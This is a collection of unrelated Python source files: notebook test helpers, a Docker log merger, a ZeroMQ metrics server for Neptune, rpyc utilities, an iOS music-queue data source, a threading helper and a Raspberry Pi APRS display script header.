raise RuntimeError("Failed to teardown zmq Context, open sockets likely left lying around.")
@classmethod
def base_url(cls):
return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status"
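
# --- Hedged example (not part of the real test suite) --------------------------
# A minimal test case built on NotebookTestBase and assert_http_error; the
# missing-notebook path below is hypothetical.
class ExampleContentsAPITest(NotebookTestBase):
    """Illustrates how NotebookTestBase is meant to be subclassed."""

    def test_root_listing(self):
        response = self.request('GET', 'api/contents')
        response.raise_for_status()
        self.assertEqual(response.status_code, 200)

    def test_missing_notebook_is_404(self):
        with assert_http_error(404):
            response = self.request('GET', 'api/contents/definitely-missing.ipynb')
            response.raise_for_status()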
|
docker_log_processor.py
|
#!/usr/bin/env python
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
#
# filename: docker_log_processor.py
# author: v-greach@microsoft.com
# created: 01/29/2019
from multiprocessing import Process, Queue, Event
from threading import Thread
from datetime import datetime, timedelta
import docker
import time
import argparse
import sys
class DockerLogProcessor:
def __init__(self, container_names, options=""):
run_static = False
if options:
if "-staticfile" in options:
run_static = True
self.process_static_log(options)
if run_static == False:
self.queue = Queue()
self.logger_thread = Thread(target = self.process_queue)
self.logger_thread.start()
self.watcher_processes = []
for container_name in container_names:
print("Getting Log for: " + container_name)
new_process = Process(target = DockerLogProcessor.get_log_from_container, args=(container_name, self.queue, options))
new_process.start()
self.watcher_processes.append(new_process)
@classmethod
def format_date_and_time(self, date_in="", time_format="%Y-%m-%d %H:%M:%S.%f"):
"""
        Formats a string into a datetime value.
        If the incoming string is empty it is set to NOW; otherwise it is
        converted to a datetime using the given format.
        Parameters
        ----------
        date_in : string
            String to convert - can be empty
time_format : string
format of string for datetime conversion
Returns
-------
datetime
converted input string or NOW() if empty
"""
date_out =""
if not date_in:
date_out = datetime.strftime(datetime.now(), time_format)
return date_out
date_in = date_in.replace('T', ' ')
if len(date_in) > 26:
date_in = date_in[:26]
date_out = datetime.strptime(date_in, time_format)
return date_out
@staticmethod
def get_log_from_container(container_name, queue, options):
"""
Gets log info from the Docker container.
Parameters
----------
container_name : string
Name of the Docker container
queue : object
queue to stuff the log object in
options : string
Options - basically the argv passed to the class
"""
client = docker.from_env()
container = client.containers.get(container_name)
for log_line in container.logs(stream=True, tail=0, follow=True, timestamps=True):
try:
log_line = log_line.decode('utf8').strip()
log_line_parts = log_line.split("Z ")
log_line_object = LogLineObject(DockerLogProcessor.format_date_and_time(log_line_parts[0]), container_name, log_line_parts[1])
queue.put(log_line_object)
except Exception as e:
write_err("Exception getting container log_line from: " + container_name)
self.write_err(e)
def split(self, string, delimiters):
"""
Split a string with multiple delimiters.
"""
import re
regexPattern = '|'.join(map(re.escape, delimiters))
return re.split(regexPattern, string)
def write_err(self, msg):
"""
write a string to stdout and stderr.
"""
print(msg, file=sys.stderr)
print(msg)
def get_timestamp_delta(self, date_one, date_two, line_count = 0, line_mod = 100):
"""
Diff date_one and date_two then format string for readability.
Delta of the strings are slammed into submission by fields.
line_count can be used to print a full timestamp every line_mod lines
"""
if line_mod != 0 and line_count % line_mod == 0:
return date_one
time_delta_str = ""
delimiters = ('.', '-', ' ', ':')
field_count = 0
all_fields_one = self.split(date_one, delimiters)
all_fields_two = self.split(date_two, delimiters)
for field1 in all_fields_one:
if field1 == all_fields_two[field_count]:
for _ in field1:
time_delta_str += " "
else:
time_delta_str += all_fields_one[field_count]
if field_count < 2:
time_delta_str += "-"
elif field_count == 2:
time_delta_str += " "
elif field_count > 2 and field_count < 5 :
time_delta_str += ":"
elif field_count == 5 :
time_delta_str += "."
field_count += 1
return time_delta_str
def process_static_log(self, options):
"""
Got some static logs - set 'em up for processing.
Static log(s) specified.
parse the options with argparse.
        get a list of filenames to process,
get the output filename,
get json filters.
read all log files and format each line
sort and push to output
"""
write_log_filename = "logsbytime.log"
split_str = ' ' + u"\u2588" + ' '
loglines = []
max_name_len = 0
filter_json_file = ""
filter_list = ""
pytest_owner = ""
parser = argparse.ArgumentParser(description="Docker Log Processor")
parser.add_argument('-outputfile', nargs=1, help="filename to write output")
parser.add_argument('-staticfile', nargs='+', help="filename to read from")
parser.add_argument('-filterfile', nargs=1, help="filename of json filters")
arguments = parser.parse_args(options.split(' '))
import os
dir_name = os.path.dirname(os.path.abspath(__file__))
out_filenames = arguments.outputfile
if len(out_filenames) > 1:
self.write_err("ERR: Too many -outfiles")
return
else:
out_filename = out_filenames[0]
out_filename = out_filename.strip()
write_log_filename = os.path.basename(out_filename)
import json
filter_filenames = arguments.filterfile
if len(filter_filenames) > 1:
self.write_err("ERR: Too many -filterfile")
return
else:
filter_filename = filter_filenames[0]
filter_json_file = filter_filename.strip()
full_filter_path = os.path.join(os.sep, dir_name, filter_json_file)
try:
filter_json = open(full_filter_path, encoding="utf8").read()
if filter_json:
json_data = json.loads(filter_json)
filter_list = json_data['filters']
except Exception as e:
self.write_err("Exception processing JSON file: " + full_filter_path)
self.write_err(e)
return
static_filenames = arguments.staticfile
# find the max_name_len of every staticfile filename
for static_filename in static_filenames:
if static_filename:
static_filename = static_filename.strip()
base_filename = os.path.basename(static_filename)
name_len = len(base_filename)
if name_len > max_name_len:
max_name_len = name_len
for static_filename in static_filenames:
if static_filename:
static_filename = static_filename.strip()
base_filename = os.path.basename(static_filename)
module_name = base_filename
# Pad the filename so that each is the same length
for _ in range(len(base_filename), max_name_len):
module_name += ' '
full_log_path = os.path.join(os.sep, dir_name, static_filename)
try:
read_file = open(full_log_path, encoding="utf8").read().split("\n")
except Exception as e:
self.write_err("Exception opening LOG file: " + full_log_path )
self.write_err(e)
# Get and filter each line
for log_line in read_file:
ok_to_log = True
if log_line:
if "PYTEST" in log_line:
if not pytest_owner:
pytest_owner = base_filename
else:
if pytest_owner != base_filename:
ok_to_log = False
if ok_to_log:
for filter in filter_list:
if filter in log_line:
ok_to_log = False
if ok_to_log:
                            # Made it past the filters and business logic, LOG IT
log_line_parts = log_line.split("Z ")
if log_line_parts:
log_data = ""
num_parts = len(log_line_parts)
# Handle case where more than one timestamp
if num_parts > 2:
for part in range(1, num_parts):
log_data += log_line_parts[part] + ' '
else:
log_data = log_line_parts[1]
log_time = DockerLogProcessor.format_date_and_time(log_line_parts[0], "%Y-%m-%d %H:%M:%S.%f")
log_line_object = LogLineObject(log_time, module_name, log_data)
loglines.append(log_line_object)
loglines.sort(key=lambda x: x.timestamp)
last_timestamp = datetime.now() + timedelta(days=-364)
line_count = 0
#Done processing and sorted, now display and write results
write_log_filename = os.path.join(os.sep, dir_name, write_log_filename)
with open(write_log_filename,'w', encoding="utf-8") as outfile:
for log_line in loglines:
logline_timestamp = log_line.timestamp
date_delta = self.get_timestamp_delta(str(logline_timestamp), str(last_timestamp), line_count)
line_count += 1
out_line = log_line.module_name + " : " + date_delta + split_str + log_line.log_data
print(out_line)
outfile.write("{}\n".format(out_line))
last_timestamp = logline_timestamp
def process_queue(self):
"""
Process the line objects in the queue, and print as formatted.
"""
last_timestamp = datetime.now() + timedelta(days=-364)
line_count = 0
while True:
log_line = self.queue.get()
logline_timestamp = log_line.timestamp
date_delta = self.get_timestamp_delta(str(logline_timestamp), str(last_timestamp), line_count)
line_count += 1
print(log_line.module_name + " : " + date_delta + " : " + log_line.log_data)
last_timestamp = logline_timestamp
class LogLineObject:
def __init__ (self, timestamp, module_name='', log_data=''):
self.timestamp = timestamp
self.module_name = module_name
self.log_data = log_data
if __name__ == "__main__":
log_processor = DockerLogProcessor([], " ".join(sys.argv[1:]))
|
neptune_mp_server.py
|
import zmq
import json
import StringIO
from time import time, sleep
import numpy as np
import os
from tensorpack.utils.neptune_utils import Neptune, NeptuneContextWrapper, JobWrapper, ChannelWrapper
import traceback
neptune = Neptune()
class Server(object):
def __init__(self, number_of_workers, port, debug_charts, adam_debug, schedule_hyper, experiment_dir):
self.port = port
self.debug_charts = debug_charts
self.adam_debug = adam_debug
self.schedule_hyper = schedule_hyper
self.neptune_ctx = NeptuneContextWrapper(experiment_dir)
job = self.neptune_ctx.job
self.workers_set = set()
def create_channel(name, channel_type=neptune.ChannelType.NUMERIC):
return job.create_channel(name=name, channel_type=channel_type)
def create_per_worker_channels_and_chart(name):
channels = [create_channel('{}_{}'.format(name, i)) for i in range(number_of_workers)]
job.create_chart(
name=name,
series={
'{}_{}'.format(name, i) : channel for i, channel in enumerate(channels)
})
return channels
self.score_mean_channel = create_channel('score_mean')
self.score_max_channel = create_channel('score_max')
self.online_score_channel = create_channel('online_score')
job.create_chart(
name='score',
series={
'score_mean' : self.score_mean_channel,
'score_max' : self.score_max_channel,
'online_score' : self.online_score_channel
})
self.cost_channel = create_channel('cost')
self.policy_loss_channel = create_channel('policy_loss')
self.xentropy_loss_channel = create_channel('xentropy_loss')
self.max_logit_channel = create_channel('max_logit')
self.value_loss_channel = create_channel('value_loss')
self.advantage_channel = create_channel('advantage')
self.pred_reward_channel = create_channel('pred_reward')
job.create_chart(
name='loss',
series= {
'cost' : self.cost_channel,
'policy_loss' : self.policy_loss_channel,
'xentropy_loss' : self.xentropy_loss_channel,
'value_loss' : self.value_loss_channel,
'advantage' : self.advantage_channel,
'pred_reward' : self.pred_reward_channel,
'max_logit' : self.max_logit_channel
})
self.active_workes_channel = create_channel('active_workers')
self.dp_per_s_channel = create_channel('dp_per_s')
job.create_chart(
name='other',
series={
'active_workers' : self.active_workes_channel,
'datapoints/s' : self.dp_per_s_channel
})
self.active_relus_channel = create_channel('active_relus')
job.create_chart(
name='active relus',
series={
'active_relus' : self.active_relus_channel
})
self.max_delay_channel = create_channel('max_delay')
self.mean_delay_channel = create_channel('mean_delay')
self.min_delay_channel = create_channel('min_delay')
job.create_chart(
name='delay',
series={
'max_delay' : self.max_delay_channel,
'mean_delay' : self.mean_delay_channel,
'min_delay' : self.min_delay_channel
})
if self.adam_debug:
self.adam_m_norm_channel = create_channel('adam_m_norm')
self.adam_v_norm_channel = create_channel('adam_v_norm')
self.adam_update_norm_channel = create_channel('adam_update_norm')
self.adam_lr_channel = create_channel('adam_lr')
job.create_chart(
name='adam_state',
series={
'm_norm' : self.adam_m_norm_channel,
'v_norm' : self.adam_v_norm_channel,
'update_norm' : self.adam_update_norm_channel,
'lr' : self.adam_lr_channel
})
if self.schedule_hyper:
self.learning_rate_channel = create_channel('learning_rate')
self.entropy_beta_channel = create_channel('entropy_beta')
job.create_chart(
name='scheduled hyperparams',
series={
'learning rate' : self.learning_rate_channel,
'entropy beta' : self.entropy_beta_channel
})
if not self.debug_charts:
self.start_time = time()
return
self.grad_norm_before_clip_channel = create_channel('grad_norm_before_clip')
self.grad_norm_after_clip_channel = create_channel('grad_norm_after_clip')
job.create_chart(
name='gradients',
series={
'grad_norm_before_clip' : self.grad_norm_before_clip_channel,
'grad_norm_after_clip' : self.grad_norm_after_clip_channel
})
self.cost_channels = create_per_worker_channels_and_chart('cost')
self.xentropy_loss_channels = create_per_worker_channels_and_chart('xentropy_loss')
self.value_loss_channels = create_per_worker_channels_and_chart('value_loss')
self.policy_loss_channels = create_per_worker_channels_and_chart('policy_loss')
self.mean_value_channels = create_per_worker_channels_and_chart('mean_value')
self.mean_state_channels = create_per_worker_channels_and_chart('mean_state')
self.mean_action_channels = create_per_worker_channels_and_chart('mean_action')
self.mean_future_reward_channels = create_per_worker_channels_and_chart('mean_futurereward')
self.mean_init_R_channels = create_per_worker_channels_and_chart('mean_init_R')
self.games_over_channels = create_per_worker_channels_and_chart('games_over')
self.fc_value_channels = create_per_worker_channels_and_chart('fc_value')
self.fc_fc0_channels = create_per_worker_channels_and_chart('fc_fc0')
self.conv0_out_channels = create_per_worker_channels_and_chart('conv0_out')
self.conv1_out_channels = create_per_worker_channels_and_chart('conv1_out')
self.conv2_out_channels = create_per_worker_channels_and_chart('conv2_out')
self.conv3_out_channels = create_per_worker_channels_and_chart('conv3_out')
self.fc1_0_out_channels = create_per_worker_channels_and_chart('fc1_0_out')
self.fc_pi_out_channels = create_per_worker_channels_and_chart('fc_pi_out')
self.fc_v_out_channels = create_per_worker_channels_and_chart('fc_v_out')
self.start_time = time()
def _get_hours_since_start(self):
return (time() - self.start_time) / (60. * 60.)
def _get_minutes_since(self, t):
return (time() - t) / 60.
def _send_per_worker_loss(self, x, id, content):
# original x may not be strictly increasing
x = self._get_hours_since_start()
self.cost_channels[id].send(x, content[1])
self.policy_loss_channels[id].send(x, content[2])
self.xentropy_loss_channels[id].send(x, content[3])
self.value_loss_channels[id].send(x, content[4])
def _dump_to_channels(self, id, content):
x = self._get_hours_since_start()
self.workers_set.add(id) # add this worker to active workers
if content[0] == 'score':
if len(content) == 4:
x = content[3]
self.score_mean_channel.send(x, content[1])
self.score_max_channel.send(x, content[2])
elif content[0] == 'loss':
self.cost_channel.send(x, content[1])
self.policy_loss_channel.send(x, content[2])
self.xentropy_loss_channel.send(x, content[3])
self.value_loss_channel.send(x, content[4])
self.advantage_channel.send(x, content[5])
self.pred_reward_channel.send(x, content[6])
self.max_logit_channel.send(x, content[7])
if self.debug_charts:
self._send_per_worker_loss(x, id, content)
elif content[0] == 'online':
self.online_score_channel.send(x, content[1])
elif content[0] == 'other':
self.active_relus_channel.send(x, content[1])
self.dp_per_s_channel.send(x, content[2])
elif content[0] == 'delays':
self.mean_delay_channel.send(x, content[1][0])
self.max_delay_channel.send(x, content[1][1])
self.min_delay_channel.send(x, content[1][2])
if self.adam_debug and content[0] == 'adam':
self.adam_m_norm_channel.send(x, content[1])
self.adam_v_norm_channel.send(x, content[2])
self.adam_update_norm_channel.send(x, content[3])
self.adam_lr_channel.send(x, content[4])
if self.schedule_hyper and content[0] == 'schedule':
self.learning_rate_channel.send(x, content[1])
self.entropy_beta_channel.send(x, content[2])
if not self.debug_charts:
return
if content[0] == 'grad':
self.grad_norm_before_clip_channel.send(x, content[1])
self.grad_norm_after_clip_channel.send(x, content[2])
elif content[0] == 'other':
self.fc_fc0_channels[id].send(content[4], content[3])
self.fc_value_channels[id].send(content[4], content[5])
elif content[0] == 'env_state':
x = self._get_hours_since_start()
self.mean_state_channels[id].send(x, content[1])
self.mean_future_reward_channels[id].send(x, content[2])
self.mean_value_channels[id].send(x, content[3])
self.mean_init_R_channels[id].send(x, content[4])
self.mean_action_channels[id].send(x, content[5])
self.games_over_channels[id].send(x, content[6])
#self.mean_state_channel.send(x, content[1])
elif content[0] == 'layers':
self.conv0_out_channels[id].send(x, content[1])
self.conv1_out_channels[id].send(x, content[2])
self.conv2_out_channels[id].send(x, content[3])
self.conv3_out_channels[id].send(x, content[4])
self.fc1_0_out_channels[id].send(x, content[5])
self.fc_pi_out_channels[id].send(x, content[6])
self.fc_v_out_channels[id].send(x, content[7])
def main_loop(self):
print 'server main loop'
context = zmq.Context()
socket = context.socket(zmq.REP)
hostname = os.environ['SLURMD_NODENAME']
address = "tcp://*:{}".format(self.port)
print 'before socket bind... {}'.format(address)
socket.bind(address)
last_workers_check = time()
while True:
try:
print 'receiving'
message = socket.recv()
# just a trash message to reset the socket
socket.send('ACK')
id, content = json.loads(message)
self._dump_to_channels(id, content)
print content
                # every minute, count the workers the server has received any message
                # from in the last minute and send that count to neptune
if self._get_minutes_since(last_workers_check) > 1:
x = self._get_hours_since_start()
self.active_workes_channel.send(x, len(self.workers_set))
self.workers_set.clear()
last_workers_check = time()
except Exception as e:
print '======= EXCEPTION IN MP SERVER MAIN LOOP ======='
print e.message
traceback.print_exc()
break
socket.close()
class Client(object):
def __init__(self, server_host, server_port):
self.server_port = server_port
self.server_host = server_host
def send(self, message):
sio = StringIO.StringIO()
json.dump(message, sio)
context = zmq.Context()
socket = context.socket(zmq.REQ)
address = "tcp://{host}:{port}".format(host=self.server_host, port=self.server_port)
print "sending to address {}".format(address)
socket.connect(address)
socket.send(sio.getvalue())
socket.close()
if __name__ == '__main__':
number_of_workers = 5
import multiprocessing as mp
def dummy_client(id):
np.random.seed(id)
        c = Client(server_host='localhost', server_port=5000)  # port 5000 is an arbitrary example value
v = [0,0]
while True:
print 'sending...'
v[0] += np.random.random()
v[1] += np.random.random() * 2
message = (id, v)
c.send(message)
sleep(1)
for i in range(number_of_workers):
dummy = mp.Process(target=dummy_client, args=[i])
dummy.start()
    # The remaining Server arguments are illustrative defaults for a local smoke test; adjust for a real run.
    server = Server(number_of_workers=number_of_workers, port=5000, debug_charts=False,
                    adam_debug=False, schedule_hyper=False, experiment_dir='.')
server.main_loop()
|
__init__.py
|
"""
A library of various helpers functions and classes
"""
import inspect
import sys
import socket
import logging
import threading
import time
import random
from rpyc.lib.compat import maxint # noqa: F401
class MissingModule(object):
__slots__ = ["__name"]
def __init__(self, name):
self.__name = name
def __getattr__(self, name):
if name.startswith("__"): # issue 71
raise AttributeError("module %r not found" % (self.__name,))
raise ImportError("module %r not found" % (self.__name,))
def __bool__(self):
return False
__nonzero__ = __bool__
def safe_import(name):
try:
mod = __import__(name, None, None, "*")
except ImportError:
mod = MissingModule(name)
except Exception:
# issue 72: IronPython on Mono
if sys.platform == "cli" and name == "signal": # os.name == "posix":
mod = MissingModule(name)
else:
raise
return mod
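# A minimal usage sketch for safe_import (the module name is just an example): the
# returned object is either the real module or a MissingModule placeholder that is
# falsy and raises lazily on attribute access.
#   ssl = safe_import("ssl")
#   if not ssl:
#       pass  # degrade gracefully instead of failing at import time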
def setup_logger(quiet=False, logfile=None):
opts = {}
if quiet:
opts['level'] = logging.ERROR
else:
opts['level'] = logging.DEBUG
if logfile:
opts['filename'] = logfile
logging.basicConfig(**opts)
class hybridmethod(object):
"""Decorator for hybrid instance/class methods that will act like a normal
method if accessed via an instance, but act like classmethod if accessed
via the class."""
def __init__(self, func):
self.func = func
def __get__(self, obj, cls):
return self.func.__get__(cls if obj is None else obj, obj)
def __set__(self, obj, val):
raise AttributeError("Cannot overwrite method")
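# A small sketch (class name is hypothetical) of how hybridmethod dispatches:
#
#   class Service(object):
#       @hybridmethod
#       def describe(self_or_cls):
#           return self_or_cls
#
#   Service.describe() is Service   # accessed via the class -> bound to the class
#   Service().describe()            # accessed via an instance -> bound to that instance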
def spawn(*args, **kwargs):
"""Start and return daemon thread. ``spawn(func, *args, **kwargs)``."""
func, args = args[0], args[1:]
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def spawn_waitready(init, main):
"""
Start a thread that runs ``init`` and then ``main``. Wait for ``init`` to
be finished before returning.
Returns a tuple ``(thread, init_result)``.
"""
event = threading.Event()
stack = [event] # used to exchange arguments with thread, so `event`
# can be deleted when it has fulfilled its purpose.
def start():
stack.append(init())
stack.pop(0).set()
return main()
thread = spawn(start)
event.wait()
return thread, stack.pop()
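# Usage sketch (callables are hypothetical): block until the listener has finished
# binding before returning, then keep serving in the background daemon thread.
#   def init():
#       return bind_listener_socket()   # e.g. bind and listen
#   def main():
#       return serve_requests()         # runs until the process exits
#   thread, sock = spawn_waitready(init, main)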
class Timeout:
def __init__(self, timeout):
if isinstance(timeout, Timeout):
self.finite = timeout.finite
self.tmax = timeout.tmax
else:
self.finite = timeout is not None and timeout >= 0
self.tmax = time.time() + timeout if self.finite else None
def expired(self):
return self.finite and time.time() >= self.tmax
def timeleft(self):
return max((0, self.tmax - time.time())) if self.finite else None
def sleep(self, interval):
time.sleep(min(interval, self.timeleft()) if self.finite else interval)
def socket_backoff_connect(family, socktype, proto, addr, timeout, attempts):
"""connect will backoff if the response is not ready for a pseudo random number greater than zero and less than
51e-6, 153e-6, 358e-6, 768e-6, 1587e-6, 3225e-6, 6502e-6, 13056e-6, 26163e-6, 52377e-6
this should help avoid congestion.
"""
sock = socket.socket(family, socktype, proto)
collision = 0
connecting = True
while connecting:
collision += 1
try:
sock.settimeout(timeout)
sock.connect(addr)
connecting = False
except socket.timeout:
if collision == attempts or attempts < 1:
raise
else:
sock.close()
sock = socket.socket(family, socktype, proto)
time.sleep(exp_backoff(collision))
return sock
def exp_backoff(collision):
""" Exponential backoff algorithm from
Peterson, L.L., and Davie, B.S. Computer Networks: a systems approach. 5th ed. pp. 127
"""
n = min(collision, 10)
supremum_adjustment = 1 if n > 3 else 0
k = random.uniform(0, 2**n - supremum_adjustment)
return k * 0.0000512
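# Rough worked example of the delay bound (matching the socket_backoff_connect docstring):
# with collision = 4, n = 4 and the supremum adjustment is 1, so k < 2**4 - 1 = 15 and the
# delay is at most 15 * 51.2e-6 ~= 768e-6 s; the cap at n = 10 bounds the worst case near
# 1023 * 51.2e-6 ~= 52e-3 s.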
def get_id_pack(obj):
"""introspects the given "local" object, returns id_pack as expected by BaseNetref
The given object is "local" in the sense that it is from the local cache. Any object in the local cache exists
in the current address space or is a netref. A netref in the local cache could be from a chained-connection.
To handle type related behavior properly, the attribute `__class__` is a descriptor for netrefs.
So, check thy assumptions regarding the given object when creating `id_pack`.
"""
if hasattr(obj, '____id_pack__'):
# netrefs are handled first since __class__ is a descriptor
return obj.____id_pack__
elif inspect.ismodule(obj) or getattr(obj, '__name__', None) == 'module':
# TODO: not sure about this, need to enumerate cases in units
if isinstance(obj, type): # module
obj_cls = type(obj)
name_pack = '{0}.{1}'.format(obj_cls.__module__, obj_cls.__name__)
return (name_pack, id(type(obj)), id(obj))
else:
if inspect.ismodule(obj) and obj.__name__ != 'module':
if obj.__name__ in sys.modules:
name_pack = obj.__name__
else:
name_pack = '{0}.{1}'.format(obj.__class__.__module__, obj.__name__)
elif inspect.ismodule(obj):
                name_pack = '{0}.{1}'.format(obj.__module__, obj.__name__)
print(name_pack)
elif hasattr(obj, '__module__'):
name_pack = '{0}.{1}'.format(obj.__module__, obj.__name__)
else:
obj_cls = type(obj)
name_pack = '{0}'.format(obj.__name__)
return (name_pack, id(type(obj)), id(obj))
elif not inspect.isclass(obj):
name_pack = '{0}.{1}'.format(obj.__class__.__module__, obj.__class__.__name__)
return (name_pack, id(type(obj)), id(obj))
else:
name_pack = '{0}.{1}'.format(obj.__module__, obj.__name__)
return (name_pack, id(obj), 0)
def get_methods(obj_attrs, obj):
"""introspects the given (local) object, returning a list of all of its
methods (going up the MRO).
:param obj: any local (not proxy) python object
:returns: a list of ``(method name, docstring)`` tuples of all the methods
of the given object
"""
methods = {}
attrs = {}
if isinstance(obj, type):
# don't forget the darn metaclass
mros = list(reversed(type(obj).__mro__)) + list(reversed(obj.__mro__))
else:
mros = reversed(type(obj).__mro__)
for basecls in mros:
attrs.update(basecls.__dict__)
for name, attr in attrs.items():
if name not in obj_attrs and hasattr(attr, "__call__"):
methods[name] = inspect.getdoc(attr)
return methods.items()
|
mqv_datasource.py
|
import rubicon.objc as objc
import objc_util # pylint: disable=import-error
import threading
import time
from .mqv_song import MQVSong
from .mqv_songchangedetector import MQVSongChangeDetector
_warnForDefinedClass = False
NSLog = objc_util.c.NSLog
NSLog.argtypes = [objc_util.c_void_p]
try:
MQVDataSource = objc.ObjCClass("MQVDataSource")
if _warnForDefinedClass:
print("MQVDataSource already defined")
except NameError:
UITableViewDataSource = objc.ObjCProtocol("UITableViewDataSource")
class MQVDataSource(objc.NSObject, protocols=[UITableViewDataSource]):
@objc.objc_method
def initWithTableView_(self, tableView):
self.musicPlayer = objc.ObjCClass("MPMusicPlayerController").systemMusicPlayer
self.tableView = tableView
self.songList = []
self.isEnumerating = False
self.enumerationLock = threading.Lock()
self.beginEnumeratingSongs()
self.changeDetector = objc.ObjCClass("MQVSongChangeDetector").alloc().init()
self.changeDetector.MQVCallback = self.beginEnumeratingSongs
self.changeDetector.start()
return self
@objc.objc_method
def enumerateSongs(self):
newSongList = []
currentIndex = self.musicPlayer.indexOfNowPlayingItem + 1
maxIndex = self.musicPlayer.numberOfItems()
for index in range(currentIndex, maxIndex):
song = self.musicPlayer.nowPlayingItemAtIndex(index)
if song and "MPModelObjectMediaItem" in song.debugDescription and song.title is None:
break
else:
newSongList.append(objc.ObjCClass("MQVSong").alloc().initWithSong(song))
pass
pass
self.songList = newSongList
self.enumerationLock.release()
self.isEnumerating = False
self.reloadTable()
pass
@objc.objc_method
def beginEnumeratingSongs(self):
self.enumerationLock.acquire(True)
self.isEnumerating = True
self.reloadTable()
threading.Thread(target=self.enumerateSongs).start()
pass
@objc.objc_method
@objc_util.on_main_thread
def reloadTable(self):
self.tableView.reloadData()
            if self.tableView.numberOfRowsInSection(0) != 0:
indexZero = objc.ObjCClass("NSIndexPath").indexPathForRow(0, inSection=0)
self.tableView.scrollToRowAtIndexPath(indexZero, atScrollPosition=1, animated=True)
pass
pass
@objc.objc_method
def tableView_numberOfRowsInSection_(self, tableView, section: int) -> int:
if self.isEnumerating:
return 1
else:
return len(self.songList)
@objc.objc_method
def tableView_cellForRowAtIndexPath_(self, tableView, indexPath):
if self.isEnumerating:
cellIdentifer = "MQVActivityCell"
cell = tableView.dequeueReusableCellWithIdentifier(cellIdentifer)
if cell is None:
cell = objc.ObjCClass("UITableViewCell").alloc().initWithStyle(0, reuseIdentifier=cellIdentifer)
pass
cell.userInteractionEnabled = False
activityIndicator = objc.ObjCClass("UIActivityIndicatorView").alloc().initWithActivityIndicatorStyle(100)
activityIndicator.hidesWhenStopped = True
activityIndicator.center = objc.NSPoint(
self.tableView.frame.size.width / 2,
cell.frame.size.height / 2
)
cell.contentView.addSubview(activityIndicator)
activityIndicator.startAnimating()
return cell
cellIdentifer = "MQVSongCell"
cell = tableView.dequeueReusableCellWithIdentifier(cellIdentifer)
if cell is None:
cell = objc.ObjCClass("UITableViewCell").alloc().initWithStyle(3, reuseIdentifier=cellIdentifer)
pass
            if indexPath.row >= len(self.songList):
return cell
song = self.songList[indexPath.row]
cell.textLabel.text = song.title
cell.detailTextLabel.text = song.artist
cell.imageView.image = song.art
if song.exists:
cell.userInteractionEnabled = True
cell.textLabel.enabled = True
cell.detailTextLabel.enabled = True
pass
else:
cell.userInteractionEnabled = False
cell.textLabel.enabled = False
cell.detailTextLabel.enabled = False
pass
return cell
pass
@objc.objc_method
def disposeDataSource(self):
self.changeDetector.stop()
pass
|
sched_basic.py
|
from __future__ import absolute_import
import logging
import threading
import signal
import subprocess
import socket
try:
from queue import Queue
except ImportError:
from Queue import Queue
__all__="subprocess socket Queue Lock Event spawn serve_forever".split()
Lock = threading.RLock
Event = threading.Event
class Threadlet(object):
def __init__(self, func, *args, **kwargs):
result = Queue()
def wrap():
try:
obj = (func(*args, **kwargs), None)
except Exception as e:
                logging.warning("fail in thread", exc_info=True)
obj = (None, e)
result.put(obj)
self.thread = threading.Thread(target=wrap)
self.result = result
self.value = None
def start(self):
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout)
def get(self, block=True, timeout=None):
if self.thread.ident is None:
self.thread.start()
if self.result:
values = self.result.get(block=block, timeout=timeout)
self.result = None
if values[1] is None:
self.value = values[0]
else:
raise values[1]
return self.value
def spawn(func, *args, **kwargs):
th = Threadlet(func, *args, **kwargs)
th.start()
return th
def serve_forever(*servers, **opts):
ev = opts.get("main")
if not ev:
ev = Event()
signal.signal(signal.SIGINT, lambda num,fr: ev.set())
for serv in servers:
serv.start()
try:
while not ev.is_set():
ev.wait(timeout=0.5)
finally:
for serv in servers:
serv.stop()
if __name__=="__main__":
with Lock():
r = spawn(lambda x: x, 1)
assert r.get() == 1
e = Event()
def remote():
e.set()
r = spawn(remote)
assert e.wait(0.5)
assert r.get() == None
r.join()
|
direwatch.py
|
#!/usr/bin/python3
# direwatch
"""
Craig Lamparter KM6LYW, 2022, MIT License
Code derived from Adafruit PIL python example
This will tail a direwolf log file and display callsigns on an
adafruit st7789 tft display (https://www.adafruit.com/product/4484).
Follow the instructions here to get the driver/library loaded:
https://learn.adafruit.com/adafruit-mini-pitft-135x240-color-tft-add-on-for-raspberry-pi/python-setup
Current configuration is for the 240x240 st7789 unit.
Do not install the kernel module/framebuffer.
GPIO pins 12 (PTT) and 16 (DCD) are monitored and light green/red icons respectively.
Configure these gpio pins in direwolf.
Installation on raspbian/bullseye for short-attention-span programmers like me:
sudo apt-get install python3-pip # python >= 3.6 required
sudo pip3 install adafruit-circuitpython-rgb-display
sudo pip3 install pyinotify
sudo apt-get install python3-dev python3-rpi.gpio
vi /boot/config.txt # uncomment following line: "dtparam=spi=on"
sudo pip3 install --upgrade adafruit-python-shell
wget https://raw.githubusercontent.com/adafruit/Raspberry-Pi-Installer-Scripts/master/raspi-blinka.py
sudo python3 raspi-blinka.py ## this gets the digitalio python module
sudo pip install aprslib ## so we can parse ax.25 packets
Much code taken from ladyada for her great work driving these devices,
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
"""
import argparse
import time
import subprocess
import digitalio
import board
from PIL import Image, ImageDraw, ImageFont
import re
import adafruit_rgb_display.st7789 as st7789
import pyinotify
import RPi.GPIO as GPIO
import threading
import signal
import os
import aprslib
# Configuration for CS and DC pins (these are PiTFT defaults):
cs_pin = digitalio.DigitalInOut(board.CE0)
dc_pin = digitalio.DigitalInOut(board.D25)
#reset_pin = digitalio.DigitalInOut(board.D24)
# Config for display baudrate (default max is 24mhz):
BAUDRATE = 64000000
# Setup SPI bus using hardware SPI:
spi = board.SPI()
# Use one and only one of these screen definitions:
## half height adafruit screen 1.1" (240x135), two buttons
#disp = st7789.ST7789(
# board.SPI(),
# cs=cs_pin,
# dc=dc_pin,
# baudrate=BAUDRATE,
# width=135,
# height=240,
# x_offset=53,
# y_offset=40,
# rotation=270,
#)
# full height adafruit screen 1.3" (240x240), two buttons
disp = st7789.ST7789(
spi,
cs=cs_pin,
dc=dc_pin,
baudrate=BAUDRATE,
height=240,
y_offset=80,
rotation=180
)
